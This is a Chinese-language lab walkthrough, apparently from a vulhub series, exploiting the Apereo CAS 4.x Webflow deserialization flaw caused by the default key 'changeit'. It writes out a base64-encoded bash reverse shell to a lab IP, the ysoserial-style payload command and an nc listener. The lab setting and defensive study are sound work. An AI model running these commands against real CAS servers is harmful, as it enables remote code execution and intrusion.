（六）vulhub专栏：Apereo-cas 4.x反序列化漏洞

Apereo-cas 4.x反序列化漏洞

影响范围

Apereo-cas 4.1.7之前

漏洞成因

Webflow中使用了默认密钥changeit，代码如下：

public class EncryptedTranscoder implements Transcoder {
    private CipherBean cipherBean;
    private boolean compression = true;

    public EncryptedTranscoder() throws IOException {
        BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
        bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
        bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
        bufferedBlockCipherBean.setKeyAlias("aes128");
        bufferedBlockCipherBean.setKeyPassword("changeit");
        bufferedBlockCipherBean.setNonce(new RBGNonce());
        this.setCipherBean(bufferedBlockCipherBean);
    }

1
2
3
4
5
6
7
8
9
10
11
12
13
14

漏洞利用

环境准备

首先输入以下命令进入vulhub里启动靶场，然后在攻击机里访问http://192.168.75.146:8080/cas/login即可

cd vulhub-master/apereo-cas/4.1-rce
docker-compose up -d
1
2

漏洞复现

首先准备好生成payload的工具：apereo-cas-attack-1.0-SNAPSHOT-all.jar

工具地址：https://github.com/vulhub/Apereo-CAS-Attack/releases

然后准备好反弹shell的命令，需要对其进行base64加密

//反弹shell命令，注意替换为自己的
bash -i >& /dev/tcp/192.168.75.162/6666 0>&1
//base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=
1
2
3
4

java  -jar  apereo-cas-attack-1.0-SNAPSHOT-all.jar  CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}"
1

执行完上述命令会生成一串payload，接下来新打开一个cmd窗口执行以下命令：

nc -lvvp 6666
1

监听启动后我们在浏览器输入账号密码抓包，发送到重放器，替换execution的内容并发送，可以看到如下图，反弹shell成功，此漏洞利用成功